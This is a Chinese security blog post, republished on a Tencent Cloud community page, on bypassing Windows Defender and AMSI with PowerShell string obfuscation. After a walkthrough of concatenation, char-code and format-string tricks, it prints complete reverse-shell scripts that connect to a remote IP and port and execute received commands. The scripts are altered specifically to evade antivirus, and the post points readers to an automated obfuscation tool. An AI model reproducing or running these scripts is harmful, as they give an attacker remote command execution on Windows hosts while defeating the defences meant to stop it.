专栏首页鸿鹄实验室Bypass Windows Defender Reverse Shell

Bypass Windows Defender Reverse Shell

引言

本文将从powershell特性说起,一步步介绍powershell特性,并使用特性绕过Windows Defender Reverse Shell,并在最后给出自动化工具。

0x01 powershell特性:

首先我们先来了解关于powershell的一些特性,他将有效的帮助我们来绕过各类AV\EDR等,来执行我们的恶意代码,在win10中引入了amsi机制,可以有效的预防powershell执行恶意代码,比如下面这样:

Write-Host "amsicontext"

下面将介绍几个powershell特性,以帮助我们来进行bypass操作。

1、字符串拼接

PS C:\Users\Administrator> $context = "amsi" + "context" 
PS C:\Users\Administrator> Write-Host $context

2、ASCII码转换

PS C:\Users\Administrator> Write-Host([char]97+[char]109+[char]115+[char]105+[char]101+[char]111+[char]110+[char]116+[char]101+[char]120+[char]116)

3、变量拼接

PS C:\Users\Administrator> $var = "context" 
PS C:\Users\Administrator> Write-Host "amsi+$var"amsi+context
PSC:\Users\Administrator> Write-Host "amsi$var"

4、字符串格式化

PS C:\Users\Administrator> $string = "amsi{0}{1}" -f "con","text" 
PS C:\Users\Administrator> Write-Host $string

5、字符串替换

PS C:\Users\Administrator> $replace = "amsiABCDEF" -replace"ABCDEF","context" 
PS C:\Users\Administrator> Write-Host $replace

0x02 实战bypass

我们以反弹shell代码为例,实战bypass,代码如下:

$sm=(New-Object 
Net.Sockets.TCPClient('192.168.254.1',55555)).GetStream();
[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;
$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);
$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));
$sm.Write($st,0,$st.Length)}

测试这类代码的精髓就是依次删除,找到拦截的关键字。经测试,代码变为下面这样时,不再拦截。

但此时无法执行命令。仔细观察代码,我们可以尝试更改其中的敏感词,比如变为下面这样:

$sm=(New-Object Net.Sockets.TCPClient('192.168.2.114',4444)).GetStream();
[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;
$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);
$var = "ASCII";
$st=([text.encoding]::$var).GetBytes((iex $d 2>&1));
$sm.Write($st,0,$st.Length)}

成功bypass,再比如下面这个代码:

#$client = New-Object System.Net.Sockets.TCPClient('192.168.254.1',4444);
$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};
$client.Close()
$client = New-Object System.Net.Sockets.TCPClient('192.168.2.114',4444);
$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';
$var = "utf8";
$sendbyte = ([text.encoding]::$var).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()};
$client.Close()

bypass

自动化

https://github.com/danielbohannon/Invoke-Obfuscation

END

本文分享自微信公众号 - 鸿鹄实验室(gh_a2210090ba3f),作者:鸿鹄

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2020-09-06

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • MeterPwrShell:绕过AMSI,绕过防火墙,绕过UAC和绕过任何AV

    生成Powershell Oneliner的自动化工具,该工具可以在Metasploit,Bypass AMSI,Bypass防火墙,Bypas...

    Khan安全团队
  • GadgetToJScript在VBA中的利用

    https://www.shutingrz.com/post/explore-dotnet-serialize-g2js/

    鸿鹄实验室
  • 从远程桌面服务到获取Empire Shell

    本文将为大家详细介绍如何在只能访问远程桌面服务,且有 AppLocker 保护 PowerShell 处于语言约束模式下获取目标机器 Empire shell。...

    FB客服
  • Windows defender bypass | 免杀

    在制作免杀的过程中,翻找 Windows 官方对 Windows Defender 的介绍,发现有这样一个目录:Configure Microsoft Defe...

    意大利的猫
  • Invoke-Obfuscation混淆免杀过360和火绒

    乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任...

    乌鸦安全
  • AutoRDPwn v4.8:一款功能强大的隐蔽型攻击框架

    今天给大家介绍的是一款名叫AutoRDPwn的隐蔽型攻击框架,实际上AutoRDPwn是一个PowerShell脚本,它可以实现对Windows设备的自动化攻击...

    FB客服
  • regsvr32绕过(二)

    发现主要是Cmdline这里报的错,当然分类这里是因为MSF的脚本内容触发了AMSI的内容:

    鸿鹄实验室
  • 渗透测试中常用powershell(一)

    参考:https://www.anquanke.com/post/id/86241

    Jumbo
  • 使用Golang免杀Tips

    在此文章中,将详细介绍一个很酷的小技巧,它涉及如何绕过大多数防病毒产品以在目标主机上获得Metepreter反向shell.

    黑白天安全
  • 使用microsoft绕过360等AV

    震惊!某小白竟然利用windows绕过了windows Defender、360等AV。

    鸿鹄实验室
  • OffenSive Csharp Development Part5 && 星球来袭

    本文是OffenSive Csharp Development的第五篇文章,主要讲解如何使用C#进行AMSI bypass。

    鸿鹄实验室
  • PICUS RED TEAM部分题解

    害,昨天发的题目留言区也没人聊聊思路,还是我来吧。事件原因这里只介绍部分题解,如有兴趣回头整理一份完整的wp发出来。

    鸿鹄实验室
  • 红队培训班作业 | 混淆&反沙盒机制&隐藏shellcode 过杀软静态检测

    l 如下代码为实现payload经过fernet对称加密的shellcode生成器:

    Ms08067安全实验室
  • C2工具之RedPeanut(红花生)

    RedPeanut是在.Net Core 2中开发的小型RAT及其在.Net 3.5 / 4.0中的代理。RedPeanut代码执行基于DonutCS生成的sh...

    鸿鹄实验室
  • Some Linux Hacking Tricks

    There is always a method here is useful for you to penetration test :)

    风流
  • Some Linux Hacking Tricks

    xfkxfk
  • 教你如何开发不可检测的C#、C++反向Shell

    在这篇文章中,我将跟大家分享如何利用C#和C++来开发反病毒产品无法检测到的反向Shell。

    FB客服
  • MSSQL绕过微软杀毒提权案例

    0x04 其他绕过思路 当目标机器存在Windows Defender防病毒软件时,即使已经拿到了Administrator会话后仍然无法执行getsyst...

    潇湘信安
  • 如何使用 PowerShell 钓鱼获取用户密码

    欺骗凭证提示是一种有效的权限提升和横向移动技术。在 Windows 环境中遇到 Outlook、VPN 和各种其他身份验证协议看似随机的密码提示...

    Khan安全团队

扫码关注云+社区

领取腾讯云代金券